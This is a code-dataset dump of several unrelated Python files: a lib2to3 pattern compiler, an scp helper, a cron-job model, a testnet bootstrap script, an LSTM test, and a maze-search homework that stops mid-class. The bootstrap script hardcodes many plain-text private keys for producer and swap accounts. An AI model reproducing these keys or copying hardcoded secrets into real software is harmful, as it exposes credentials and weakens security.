blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c0b41e154c867891ac764be89db7f66f1f4007f
|
2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac
|
/Python/Core/Lib/lib2to3/patcomp.py
|
77acfaaa38f990a0b1f904e5e21f839af6b589bf
|
[] |
no_license
|
FingerLeakers/DanderSpritz_docs
|
f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364
|
d96b6a71c039b329f9f81544f645857c75360e7f
|
refs/heads/master
| 2021-01-25T13:05:51.732149
| 2018-03-08T01:22:49
| 2018-03-08T01:22:49
| 123,527,268
| 2
| 0
| null | 2018-03-02T03:48:31
| 2018-03-02T03:48:30
| null |
UTF-8
|
Python
| false
| false
| 6,668
|
py
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: patcomp.py
"""Pattern compiler.
The grammer is taken from PatternGrammar.txt.
The compiler compiles a pattern to a pytree.*Pattern instance.
"""
__author__ = 'Guido van Rossum <guido@python.org>'
import os
import StringIO
from .pgen2 import driver, literals, token, tokenize, parse, grammar
from . import pytree
from . import pygram
_PATTERN_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), 'PatternGrammar.txt')
class PatternSyntaxError(Exception):
pass
def tokenize_wrapper(input):
"""Tokenizes a string suppressing significant whitespace."""
skip = set((token.NEWLINE, token.INDENT, token.DEDENT))
tokens = tokenize.generate_tokens(StringIO.StringIO(input).readline)
for quintuple in tokens:
type, value, start, end, line_text = quintuple
if type not in skip:
yield quintuple
class PatternCompiler(object):
def __init__(self, grammar_file=_PATTERN_GRAMMAR_FILE):
"""Initializer.
Takes an optional alternative filename for the pattern grammar.
"""
self.grammar = driver.load_grammar(grammar_file)
self.syms = pygram.Symbols(self.grammar)
self.pygrammar = pygram.python_grammar
self.pysyms = pygram.python_symbols
self.driver = driver.Driver(self.grammar, convert=pattern_convert)
def compile_pattern(self, input, debug=False, with_tree=False):
"""Compiles a pattern string to a nested pytree.*Pattern object."""
tokens = tokenize_wrapper(input)
try:
root = self.driver.parse_tokens(tokens, debug=debug)
except parse.ParseError as e:
raise PatternSyntaxError(str(e))
if with_tree:
return (self.compile_node(root), root)
else:
return self.compile_node(root)
def compile_node(self, node):
"""Compiles a node, recursively.
This is one big switch on the node type.
"""
if node.type == self.syms.Matcher:
node = node.children[0]
if node.type == self.syms.Alternatives:
alts = [ self.compile_node(ch) for ch in node.children[::2] ]
if len(alts) == 1:
return alts[0]
p = pytree.WildcardPattern([ [a] for a in alts ], min=1, max=1)
return p.optimize()
else:
if node.type == self.syms.Alternative:
units = [ self.compile_node(ch) for ch in node.children ]
if len(units) == 1:
return units[0]
p = pytree.WildcardPattern([units], min=1, max=1)
return p.optimize()
if node.type == self.syms.NegatedUnit:
pattern = self.compile_basic(node.children[1:])
p = pytree.NegatedPattern(pattern)
return p.optimize()
name = None
nodes = node.children
if len(nodes) >= 3 and nodes[1].type == token.EQUAL:
name = nodes[0].value
nodes = nodes[2:]
repeat = None
if len(nodes) >= 2 and nodes[-1].type == self.syms.Repeater:
repeat = nodes[-1]
nodes = nodes[:-1]
pattern = self.compile_basic(nodes, repeat)
if repeat is not None:
children = repeat.children
child = children[0]
if child.type == token.STAR:
min = 0
max = pytree.HUGE
elif child.type == token.PLUS:
min = 1
max = pytree.HUGE
elif child.type == token.LBRACE:
min = max = self.get_int(children[1])
if len(children) == 5:
max = self.get_int(children[3])
if min != 1 or max != 1:
pattern = pattern.optimize()
pattern = pytree.WildcardPattern([[pattern]], min=min, max=max)
if name is not None:
pattern.name = name
return pattern.optimize()
def compile_basic(self, nodes, repeat=None):
node = nodes[0]
if node.type == token.STRING:
value = unicode(literals.evalString(node.value))
return pytree.LeafPattern(_type_of_literal(value), value)
else:
if node.type == token.NAME:
value = node.value
if value.isupper():
if value not in TOKEN_MAP:
raise PatternSyntaxError('Invalid token: %r' % value)
if nodes[1:]:
raise PatternSyntaxError("Can't have details for token")
return pytree.LeafPattern(TOKEN_MAP[value])
else:
if value == 'any':
type = None
elif not value.startswith('_'):
type = getattr(self.pysyms, value, None)
if type is None:
raise PatternSyntaxError('Invalid symbol: %r' % value)
if nodes[1:]:
content = [
self.compile_node(nodes[1].children[1])]
else:
content = None
return pytree.NodePattern(type, content)
else:
if node.value == '(':
return self.compile_node(nodes[1])
if node.value == '[':
subpattern = self.compile_node(nodes[1])
return pytree.WildcardPattern([[subpattern]], min=0, max=1)
return
def get_int(self, node):
return int(node.value)
TOKEN_MAP = {'NAME': token.NAME,'STRING': token.STRING,
'NUMBER': token.NUMBER,
'TOKEN': None
}
def _type_of_literal(value):
if value[0].isalpha():
return token.NAME
else:
if value in grammar.opmap:
return grammar.opmap[value]
return None
return None
def pattern_convert(grammar, raw_node_info):
"""Converts raw node information to a Node or Leaf instance."""
type, value, context, children = raw_node_info
if children or type in grammar.number2symbol:
return pytree.Node(type, children, context=context)
else:
return pytree.Leaf(type, value, context=context)
def compile_pattern(pattern):
return PatternCompiler().compile_pattern(pattern)
|
[
"francisck@protonmail.ch"
] |
francisck@protonmail.ch
|
4c2f867eaafaafa7fe71bb3f2e8a61b7f03c0532
|
13bacb189558c8231af6bd1fd8e1dcce45c17e4d
|
/pexpect_util.py
|
c479715ddb2f49968d9d70dfbf4a01db20b7c857
|
[] |
no_license
|
zhulh200868/mycode
|
734881b963c8e57a9ff97e10bb16433fa9afb0a2
|
216a76c0aabd2c346bdfd8f4ecfbf073c1b39673
|
refs/heads/master
| 2021-01-20T19:19:02.832408
| 2016-12-31T12:08:48
| 2016-12-31T12:08:48
| 64,580,417
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
#!/usr/bin/env python
# -*- coding=utf8 -*-
import pexpect
import getpass
'''
通过scp命令传输文件
'''
host=raw_input('hostname: ')
remote_path=raw_input('remote_path: ')
local_file=raw_input('local_file: ')
passwd=getpass.getpass('password: ')
cmd='scp -r %s %s:%s'%(local_file,host,remote_path)
child=pexpect.spawn(cmd)
child.expect('password:')
child.sendline(passwd)
child.read()
|
[
"3205777381@qq.com"
] |
3205777381@qq.com
|
c79ade31fb6a146dc68d6c36b6df30e2b5618e08
|
f7f9760261c6fb5e3998477f074e3c1f42464cf8
|
/web/src/entities/cron_job.py
|
cb8c8e1035ffb9eed2bd9fbd9b12d0a586de99bd
|
[] |
no_license
|
DrXneaky/ooredoo-docker-v3-py27
|
58c4847db994ffab0d78bd76d055a75e26d57fdf
|
b44905a764765af89ffc8ce1776b59c748a1fa01
|
refs/heads/master
| 2022-12-17T11:04:26.013406
| 2020-09-13T04:31:38
| 2020-09-13T04:31:38
| 294,741,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,834
|
py
|
from src.repositories.entity import Entity, Base
from sqlalchemy import Column, String, DateTime, Integer, ForeignKey
from marshmallow import Schema, fields
from src.commons.utils.crontab import MyCronTab # , get_last_run_from_log
class CronJob (Entity, Base):
__tablename__ = 'cron_job'
creationDate = Column('creation_date', DateTime)
command = Column(String)
jobType = Column('job_type', String)
cronSchedule = Column('cron_schedule', String)
expression = Column(String)
lastRun = Column('last_run', DateTime)
status = Column(String)
nextRun = Column('next_run', DateTime)
def __init__(self, creationDate, command, jobType, schedule, expression, lastRun, status, nextRun):
self.creationDate = creationDate
self.command = command
self.jobType = jobType
self.cronSchedule = schedule
self.expression = expression
self.lastRun = lastRun
self.status = status
self.nextRun = nextRun
def job(self):
cron = MyCronTab.MyCronTab
job = cron.find_comment(str(id))
return job
def get_lastrun(self):
job = self.job()
last_run, status = MyCronTab.get_last_run_from_log(self)
return last_run, status
def update_lastrun(self, session):
self.lastRun, self.status = self.get_lastrun()
session.commit()
def update_status(self, session, status):
self.status = status
session.commit()
class CronJobSchema(Schema):
id = fields.Number()
creationDate = fields.DateTime("%Y-%m-%d, %H:%M:%S")
command = fields.Str()
jobType = fields.Str()
cronSchedule = fields.Str()
expression = fields.Str()
lastRun = fields.DateTime("%Y-%m-%d, %H:%M:%S")
status = fields.Str()
nextRun = fields.DateTime("%Y-%m-%d, %H:%M:%S")
|
[
"33802435+DrXneaky@users.noreply.github.com"
] |
33802435+DrXneaky@users.noreply.github.com
|
6c4df7f871bf27a393a753d9ed909f37d16a5456
|
1228576f109b6942764d338b91714a57ad58b851
|
/bootstrap/testnet_bootstrap.py
|
554197d9cd94e1464dba6fa376881276ddae15ec
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
lapolinar0519/remprotocol
|
b7ab95e97c8ecaab3bb40ae9cdc7cd6829916c4a
|
578996ce408ca0adbe6a6b895177199017ee907b
|
refs/heads/develop
| 2022-11-29T13:36:54.540719
| 2020-07-31T12:14:31
| 2020-07-31T12:14:31
| 263,375,233
| 0
| 0
|
MIT
| 2020-07-31T14:40:06
| 2020-05-12T15:24:07
|
C++
|
UTF-8
|
Python
| false
| false
| 10,359
|
py
|
import hashlib
import json
from datetime import datetime, timezone
import requests
from mainnet_bootstrap import remcli, run, intToRemCurrency, get_chain_id, wallet_port
producers_quantity = 21
producers_supply = 500_000_000_0000
swapbot_stake = 1_000_0000
MINIMUM_PRODUCER_STAKE = 200_0000
sign_digest_url = f'http://127.0.0.1:{wallet_port}/v1/wallet/sign_digest'
tech_accounts = [
#(account_name, public_key, stake, liquid)
('rewards', 'EOS8Znrtgwt8TfpmbVpTKvA2oB8Nqey625CLN8bCN3TEbgx86Dsvr', 1000_0000, 100_000_000_0000),
('remfaucetbot', 'EOS8Znrtgwt8TfpmbVpTKvA2oB8Nqey625CLN8bCN3TEbgx86Dsvr', 1_000_0000, 10_000_000_0000),
]
producers = {
"producers": [
{"name": "remproducer1", "pvt": "5KLGj1HGRWbk5xNmoKfrcrQHXvcVJBPdAckoiJgFftXSJjLPp7b",
"pub": "EOS8imf2TDq6FKtLZ8mvXPWcd6EF2rQwo8zKdLNzsbU9EiMSt9Lwz"},
{"name": "remproducer2", "pvt": "5K6qk1KaCYYWX86UhAfUsbMwhGPUqrqHrZEQDjs9ekP5j6LgHUu",
"pub": "EOS7Ef4kuyTbXbtSPP5Bgethvo6pbitpuEz2RMWhXb8LXxEgcR7MC"},
{"name": "remproducer3", "pvt": "5JCStvbRgUZ6hjyfUiUaxt5iU3HP6zC1kwx3W7SweaEGvs4EPfQ",
"pub": "EOS5n442Qz4yVc4LbdPCDnxNSseAiUCrNjRxAfPhUvM8tWS5svid6"},
{"name": "remproducer4", "pvt": "5JJjaKnAb9KM2vkkJDgrYXoeUEdGgWtB5WK1a38wrmKnS3KtkS6",
"pub": "EOS5y3Tm1czTCia3o3JidVKmC78J9gRQU8qHjmRjFxTyhh2vxvF5d"},
{"name": "remproducer5", "pvt": "5K7hmHA2U3nNpwGx6AffWsHyvsSMJvVKVmSgxnSYAjAvjUfzd5j",
"pub": "EOS5yR5GNn363W3cnet5PE6xWZxa2hDAhmJN5RrB1e3fmJmVNnDRJ"},
{"name": "remproduce11", "pvt": "5K3TXkZAwyJkg7TjSfopd7sTr3RXFccghXHN1nJHTzap1ZKgLdK",
"pub": "EOS76wwc1zjzRMPQnEL6rTDWLfhN2ByZd6GhDJoWBKWM6M7cUmyfS"},
{"name": "remproduce12", "pvt": "5J498VQKaFVbh2ovPrMxa5DThE1fiWWfna6H2ZofmGMaVM7bs2M",
"pub": "EOS63piLomgbAGShNu7zv3whiR52Abz8gVVMRNAqw4apJ8EQKEnQ5"},
{"name": "remproduce13", "pvt": "5JrC4vnVXroqvXtmSw3EiXcSv9agfDsKsUghzv2Rhiyrg9J36Z4",
"pub": "EOS8ZjbDEi872aLpuuAjnd76NYW6KzPaf6RBSuwXcHmKm7A1sxayV"},
{"name": "remproduce14", "pvt": "5Jx1cCRPwHM7mr8brbeS6k5GYFEDKgmz34kmfmhywToF5wqddQE",
"pub": "EOS7oiy488wfzwbR6L9QwNDQb4CHGVR5ix9udJjVyykgbLaQLgBc5"},
{"name": "remproduce15", "pvt": "5Hw5iBC7oGfR3FTwgDzHuzk4JAv24SiXq9iBbyPMb8JmKBHzjVX",
"pub": "EOS6iBVEaRDS3mofUJpa8bjD94vohHrsSqqez1wcsWjhPpeNArfBF"},
{"name": "remproduce21", "pvt": "5J3Zd6iSGcFFzRkUUqG7nKV8xifZb3sZvCnnst2WYgKqsRMvHTF",
"pub": "EOS8RpmTrNN7eEFno626tNutAKJbJ3TbMMyHi9sbmpU9t4vEYDAYM"},
{"name": "remproduce22", "pvt": "5JxWkyTDwktJVs9MNgNgmaLrRc26ESswR9gk926g47t6UCqvmop",
"pub": "EOS8jxiWA9ZHN37csWnoShEbs8tvgtYxt2UN4ZtMBXhGJRk8tQJqR"},
{"name": "remproduce23", "pvt": "5HwyQG6enrCrCZXYqrd2WsMmnreWAWUWGa9JjssodsYTSuaSA5F",
"pub": "EOS6u4zPBn1EbhNtqmSFgUhoo1ZHb1je2qUskRgk4jUe2nUfpFXLP"},
{"name": "remproduce24", "pvt": "5JyvFNY4xMHX96UFjA1sNbLTRSom5zuLSn83KYXSVu1Ex4vuY9m",
"pub": "EOS4uUK6JSXyBHNCGYEzrZzepkMSHzJsaXBAHFsieGGQ1Syzpxy11"},
{"name": "remproduce25", "pvt": "5KNe71b8F6zUszs2Mg2GPZa5cUse5i9Uy9EeH1g692aCq7KnGk9",
"pub": "EOS7iKtJ1qCgSaGfC8fquHquQYZmi43RQTkNWn68ggCTD5gUZjmYw"},
{"name": "remproduce31", "pvt": "5K61WJJWJ2ua4nz6EmgUMyAgEnRVc1MdvrHzi4PdVaPHV7R3r4M",
"pub": "EOS7KsEiRyppoaxv5yBW666b3MpDRq7FpQBttU2UUher5Ur2ke3pB"},
{"name": "remproduce32", "pvt": "5KAiF4UX7kLHeScvA7fqrSdfxKycEZ2y76uRCRD78kFpdUeq2xm",
"pub": "EOS5kiGwBZQgvY8WibiAprDbXZF1KmgEgWzwfQbAP6LFDLm5PHkyH"},
{"name": "remproduce33", "pvt": "5JwfitftPcR1eMfNuo4ZqeKYECkFCZBbPYC9zH51MK7i87packn",
"pub": "EOS66ncp9xAzdCaAggUDChFMq9YX9wfAJQmN5uMdxf8APV4ecqaZV"},
{"name": "remproduce34", "pvt": "5JyVEkLeSgioeMcw7sBLDHam4xxxDWMgaVnaBEmdWbHr9Xuo3oT",
"pub": "EOS8VPgtZmjHmPXrSmY2Mita3zevnaKDHPiiyJHTQPbf4cMdA3EiK"},
{"name": "remproduce35", "pvt": "5Jj5MMoPGp4H5bC5L6XAvDFhGGok2ghTd4mJxs9toihBYJf3oKX",
"pub": "EOS6wLPhQzGE96dMNXZxSN9GFnNtHNXY5q6CZ1BY4CizWScLvHCH6"},
{"name": "remproduce41", "pvt": "5KGWWthBagnELkrn71W4q1CtaExxasmM9X2eV8AUvjMCb1kgLHG",
"pub": "EOS7M3GEpdYZhWhKaehthCfbyQBZfHwxDbZ9ewEGysscchkHv2WCq"},
{"name": "remproduce42", "pvt": "5JEEVueiBZDXVQCTRduZnTs6hLUA29dG76p8NEQqWSZ2Fg4TkbD",
"pub": "EOS83fUneyFirnM82JT6PxgbJp5ZMxj757YJDQLFPQHKvaezRNDoX"},
{"name": "remproduce43", "pvt": "5KNMTQ3qZMH9LBjBqRMmDTi8DTGbQYYbJv1p5a58nGcYqDzaRJ5",
"pub": "EOS7rGbRupx3EkQo7dTcE9Ryx6XnEeNSEHwFABveDGtN7wUK4Xn9Q"},
{"name": "remproduce44", "pvt": "5K5KAPehBnqQD3sRryjXWfTYaPDfmMfAAYauNk49tSf2gXfCEQo",
"pub": "EOS7Xk7EhYdvWds1qkfdiTaaXYJyupJRm9Ufj5dba6QiYPqQT57hU"},
{"name": "remproduce45", "pvt": "5Jo3yZyJJwaoGzSRVi6PimiuxA3HE48Tyti7X1BmQrtt3dx2szH",
"pub": "EOS8erdpbAGK1Xbuz2zdxTY7Km2wHZfL6znXn1ijFJLPn1AR2ZzZx"},
{"name": "remproduce51", "pvt": "5JsP33C6e9edyFC6QWp361Q9ZVNKWKSznQ6198PkP1c8FpjQcdx",
"pub": "EOS64UfKJXespdvq4uYtN4rKEuSMuqRXq6rXaNkH8VCXP7iE1Bjdg"},
{"name": "remproduce52", "pvt": "5JDuKWcJFiwtogspSusdqcHWsHKEn5HydApKL58GaVNdnvQh1m1",
"pub": "EOS7DUtP3y2yqeabTYavbuFvA5yfSLM1fg7t3JVRr4dMuEJ4GZWZS"},
{"name": "remproduce53", "pvt": "5KD3hRFXkMYYUurVC3myJo9FRmT9d9XidyNXYSVTKtQ4wegh4Uw",
"pub": "EOS6K1vpE6XAX39kKAu2tBD6jJ8XpQzjWhC3X92duyQNBvdrk2zmr"},
{"name": "remproduce54", "pvt": "5JYamJxxJiB8aJhn4W5G5XUxzBd8HRNWoQop7SLNhgnf6LAiquF",
"pub": "EOS7ogfqTFzUe97Rr6taa3SmqrqQJujMmjMHgZ72TfPZFXqVWPjSa"},
{"name": "remproduce55", "pvt": "5KZFvhuNuU3es7hEoAorppkhfCuAfqBGGtzqvesArmzwVwJf64B",
"pub": "EOS69tWc1VS6aP2P1D8ryzTiakPAYbV3whbHeWUzfD8QWYuHKqQxk"}
]
}
def geometric_progression():
prod_supply_sum = 0
prod_supply = producers_supply // 2
for prod in producers['producers']:
prod['funds'] = max(prod_supply, MINIMUM_PRODUCER_STAKE)
prod_supply_sum += prod['funds']
prod_supply = prod_supply // 2
return prod_supply_sum
def algebraic_progression():
prod_stake_delta = 1_000_000_0000 # delta for arithmetic progression
prod_supply = producers_supply / producers_quantity + prod_stake_delta * (producers_quantity - 1) / 2
prod_supply_sum = 0
for prod in producers['producers']:
prod['funds'] = max(prod_supply, MINIMUM_PRODUCER_STAKE)
prod_supply_sum += prod['funds']
prod_supply = prod_supply - prod_stake_delta
return prod_supply_sum
initial_supply = geometric_progression() + swapbot_stake
for _, _, s, l in tech_accounts:
initial_supply += s + l
swap_pubkey = 'EOS8Znrtgwt8TfpmbVpTKvA2oB8Nqey625CLN8bCN3TEbgx86Dsvr'
swap_privkey = '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p'
def create_tech_accounts():
for account_name, public_key, stake, liquid in tech_accounts:
run(remcli + f' system newaccount rem {account_name} {public_key} {public_key} \
--stake "{intToRemCurrency(stake)}" --transfer -p rem@active')
def init_supply_to_rem_acc():
timestamp = datetime.today().strftime("%Y-%m-%dT%H:%M:%S")
epoch = datetime.utcfromtimestamp(0)
block_datetime_utc = datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc).timestamp()
epoch_datetime_utc = datetime.utcfromtimestamp(0).replace(tzinfo=timezone.utc).timestamp()
seconds_since_epoch = str(int(block_datetime_utc - epoch_datetime_utc))
txid = '0x0000000000000000000000000000000000000000000000000000000000000000'
return_address = '0x0000000000000000000000000000000000000000'
chain_id = get_chain_id()
return_chainid = 'eth'
rampayer = 'rem'
receiver = 'rem'
digest_to_sign = f'{receiver}*{txid}*{chain_id}*{intToRemCurrency(initial_supply)}*\
{return_address}*{return_chainid}*{seconds_since_epoch}'.encode()
headers = {
'accept': "application/json",
'content-type': "application/json"
}
response = requests.post(sign_digest_url, headers=headers,
data=json.dumps([hashlib.sha256(digest_to_sign).hexdigest(), swap_pubkey]))
sig = response.json()
run(remcli + f' push action rem.swap init \'["{rampayer}",\
"{txid}", "{swap_pubkey}",\
"{intToRemCurrency(initial_supply)}", "{return_address}", "{return_chainid}", "{timestamp}"]\'\
-p rem@active')
run(remcli + f' push action rem.swap finish \'["{rampayer}", "{receiver}",\
"{txid}",\
"{swap_pubkey}", "{intToRemCurrency(initial_supply)}", "{return_address}", "{return_chainid}",\
"{timestamp}", "{sig}"]\'\
-p rem@active')
def issue_supply_to_rem_acc():
run(remcli + f' push action rem.token issue \'["rem.swap",\
"{intToRemCurrency(initial_supply)}", "initial supply"]\' -p rem.swap -p rem ')
run(remcli + f' push action rem.token transfer \'["rem.swap", "rem",\
"{intToRemCurrency(initial_supply)}", "initial supply"]\' -p rem.swap -p rem ')
def create_producer_accounts():
for prod in producers['producers']:
run(remcli + f' system newaccount rem {prod["name"]} {prod["pub"]} {prod["pub"]} \
--stake "{intToRemCurrency(prod["funds"])}" --transfer -p rem@active')
def import_producer_keys():
for prod in producers['producers']:
run(remcli + 'wallet import --private-key ' + prod['pvt'])
def transfer_tokens_to_accounts():
for account_name, public_key, stake, liquid in tech_accounts:
run(remcli + f' transfer rem {account_name} "{intToRemCurrency(liquid)}" ""')
run(remcli + f' transfer rem swapbot "{intToRemCurrency(swapbot_stake)}" ""')
def stake_tokens():
run(remcli + f' system delegatebw swapbot swapbot \
"{intToRemCurrency(swapbot_stake)}" -p swapbot@active')
def reg_producers():
for prod in producers['producers']:
run(remcli + f' system regproducer {prod["name"]} {prod["pub"]} "" \
-p {prod["name"]}@active')
def vote_producers():
for prod in producers['producers']:
run(remcli + f' system voteproducer prods {prod["name"]} {prod["name"]} \
-p {prod["name"]}@active')
if __name__ == '__main__':
issue_supply_to_rem_acc()
create_tech_accounts()
create_producer_accounts()
import_producer_keys()
transfer_tokens_to_accounts()
stake_tokens()
reg_producers()
vote_producers()
|
[
"asaprykin17@gmail.com"
] |
asaprykin17@gmail.com
|
c55eedddca6ca6cb46267e480fe8f50a28fa5212
|
79934c18d18838dd46c563baf85f148221a5b89d
|
/training_code/input_detector/test.py
|
c444deec95e2705e818596dd772f0558fe9525c8
|
[] |
no_license
|
DungLuongTuan/Music-chat
|
0068808965ea1ac7496566bbc09195fc39e899b9
|
d66551c2fe0a7596b533c21346e22ee7b58c70a1
|
refs/heads/master
| 2021-05-07T08:03:55.852750
| 2017-12-10T17:08:02
| 2017-12-10T17:08:02
| 109,251,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,556
|
py
|
import numpy as np
import tensorflow as tf
import fasttext as ft
from os import listdir
labels = ['bot-information', 'music-domain', 'unknown']
def transform(sentence, max_step):
output = []
word2vec = ft.load_model('../../model/word2vec/vi.bin')
sentence_splited = sentence.split(' ')
for word in sentence_splited:
output.append(word2vec[word])
while (len(output) < max_step):
output.append(np.zeros(100))
return [output], [len(sentence_splited)]
def main():
### model
max_step = 100
n_hidden = 100
### enter text
text = 'tên gì ?'
data, seqlen = transform(text, max_step)
print(np.shape(data))
### build graph
x = tf.placeholder(tf.float32, [None, max_step, 100])
sequence_length = tf.placeholder(tf.int32, [None])
w = tf.get_variable(name = 'w', shape = [n_hidden, 3])
b = tf.get_variable(name = 'b', shape = [1, 3])
### LSTM layer
lstm_cell = tf.contrib.rnn.LSTMCell(num_units = n_hidden)
output, _ = tf.nn.dynamic_rnn(cell = lstm_cell, inputs = x, dtype = tf.float32)
current_batch_size = tf.shape(output)[0]
index = tf.range(0, current_batch_size)*max_step + (sequence_length - 1)
output_last = tf.gather(tf.reshape(output, [-1, n_hidden]), index)
pred = tf.nn.softmax(tf.matmul(output_last, w) + b)
sess = tf.InteractiveSession()
tf.global_variables_initializer().run()
saver = tf.train.Saver()
saver.restore(sess, '../../model/input_detector/model.ckpt')
prediction = sess.run(pred, feed_dict = {x: data, sequence_length: seqlen})
print(labels[np.argmax(prediction)])
if __name__ == '__main__':
main()
|
[
"tuanluong04011996@gmail.com"
] |
tuanluong04011996@gmail.com
|
e9a9edf90d3078fe77db28b65ad04bb9638c84c9
|
12508b40fed2526d9c6fef991701cea0581084d8
|
/mp1/search_without_class
|
24c3d3d568af415c17eec50f3b45e001dbeafec6
|
[] |
no_license
|
AlexSunNik/cs440
|
e30283f33b82ea64266375addb649d4f0ad26390
|
6fac70be7298385c9f7b9824427b25d1476cdb27
|
refs/heads/master
| 2022-05-27T01:28:42.881079
| 2020-05-03T01:44:20
| 2020-05-03T01:44:20
| 237,539,945
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,331
|
# search.py
# ---------------
# Licensing Information: You are free to use or extend this projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to the University of Illinois at Urbana-Champaign
#
# Created by Michael Abir (abir2@illinois.edu) on 08/28/2018
"""
This is the main entry point for MP1. You should only modify code
within this file -- the unrevised staff files will be used for all other
files and classes when code is run, so be careful to not modify anything else.
"""
# Search should return the path.
# The path should be a list of tuples in the form (row, col) that correspond
# to the positions of the path taken by your search algorithm.
# maze is a Maze object based on the maze from the file specified by input filename
# searchMethod is the search method specified by --method flag (bfs,dfs,astar,astar_multi,extra)
import sys
from queue import PriorityQueue
import heapq
from copy import deepcopy
def search(maze, searchMethod):
return {
"bfs": bfs,
"astar": astar,
"astar_corner": astar_corner,
"astar_multi": astar_multi,
"extra": extra,
}.get(searchMethod)(maze)
def bfs(maze):
"""
Runs BFS for part 1 of the assignment.
@param maze: The maze to execute the search on.
@return path: a list of tuples containing the coordinates of each state in the computed path
"""
#Find a single point
objs = maze.getObjectives()
start = maze.getStart()
total_path = []
for obj in objs:
queue = []
visited = {}
queue.append(start)
visited[start] = None
while len(queue) != 0:
curPt = queue.pop(0)
if curPt == obj:
path = []
while curPt is not None:
path.insert(0, curPt)
curPt = visited[curPt]
break
for p in maze.getNeighbors(curPt[0], curPt[1]): # See neighbors
if p not in visited and not maze.isWall(curPt[0], curPt[1]):
queue.append(p)
# Unlike dijkstra, which considered as visited when expanded
visited[p] = curPt
total_path += path
start = obj
return total_path
def Heu_Manhatten(curNode, dest):
# Return the manhatten distance
return abs(curNode[0] - dest[0]) + abs(curNode[1] - dest[1])
def astar(maze):
"""
Runs A star for part 1 of the assignment.
@param maze: The maze to execute the search on.
@return path: a list of tuples containing the coordinates of each state in the computed path
"""
# TODO: Write your code here
dest = maze.getObjectives()[0]
frontier = {} # Pair: node : [g_val, f_val]
prev = {} # Explored dict
start = maze.getStart()
visited = {} # Explored
frontier[start] = [0, Heu_Manhatten(start, dest)]
prev[start] = None
while len(frontier) != 0:
#Get min f_val pair
min_pair = min(frontier.items(), key=lambda x: x[1][1]) # Get by f_val
curNode = min_pair[0]
del frontier[curNode]
visited[curNode] = min_pair[1]
if maze.isObjective(curNode[0], curNode[1]):
path = []
while curNode is not None:
path.insert(0, curNode)
curNode = prev[curNode]
return path
for node in maze.getNeighbors(curNode[0], curNode[1]):
new_g = min_pair[1][0] + 1
if node in visited:
continue
if new_g < frontier.get(node, [sys.maxsize, sys.maxsize])[1]:
frontier[node] = [new_g, new_g + Heu_Manhatten(node, dest)]
prev[node] = curNode
return []
def Heu_Corner(curNode, objs):
#The function calculates the heuristic function for
#the four-corners problem
#It uses the sum of the Manhatten distance
if len(objs) == 0:
return 0
unvisited = list(objs[:]) # Perform a deep copy
start = curNode
heu = 0
while len(unvisited) != 0:
nearest_corner = min(unvisited, key=lambda x: Heu_Manhatten(start, x))
heu += Heu_Manhatten(start, nearest_corner)
start = nearest_corner
unvisited.remove(nearest_corner)
return heu
def astar_corner(maze):
frontier = []
visited = []
prev = {}
objs = tuple(maze.getObjectives())
start = maze.getStart()
f_init = Heu_Corner(start, objs)
initState = (start, objs, 0)
heapq.heappush(frontier, (f_init, initState))
prev[initState] = None
while True:
cur_state = heapq.heappop(frontier)[1]
cur_node = cur_state[0]
cur_objs = cur_state[1]
cur_g = cur_state[2]
if len(list(cur_objs)) == 0:
path = []
ite = cur_state
while ite is not None:
path.insert(0, ite[0])
ite = prev[ite]
return path
visited.append(cur_state)
for node in maze.getNeighbors(cur_node[0],cur_node[1]):
new_g = cur_g + 1
new_objs = cur_objs[:]
if node in cur_objs:
listx = list(new_objs)
listx.remove(node)
new_objs = tuple(listx)
reached_state = (node, new_objs, new_g)
new_f = new_g + Heu_Corner(node, new_objs)
flag = 0
for i in range(len(frontier)):
to_state = frontier[i][1]
if to_state[0] == node and to_state[1] == new_objs:
if new_g < to_state[2]:
frontier[i] = (new_f, reached_state)
prev[reached_state] = cur_state
heapq.heapify(frontier)
flag = 1
break
if flag:
continue
for visited_state in visited:
if visited_state[0] == reached_state[0] and visited_state[1] == reached_state[1]:
flag = 1
break
if flag:
continue
heapq.heappush(frontier, (new_f, reached_state))
prev[reached_state] = cur_state
def bfs_in_two(maze, node1, node2):
#Find a single point
obj = node1
start = node2
path = []
queue = []
visited = {}
queue.append(start)
visited[start] = None
while len(queue) != 0:
curPt = queue.pop(0)
if curPt == obj:
while curPt is not None:
path.insert(0, curPt)
curPt = visited[curPt]
return len(path)
break
for p in maze.getNeighbors(curPt[0], curPt[1]): # See neighbors
if p not in visited:
queue.append(p)
visited[p] = curPt
return len(path)
class dset:
def __init__(self):
self.upTree = {}
def addelement(self, node):
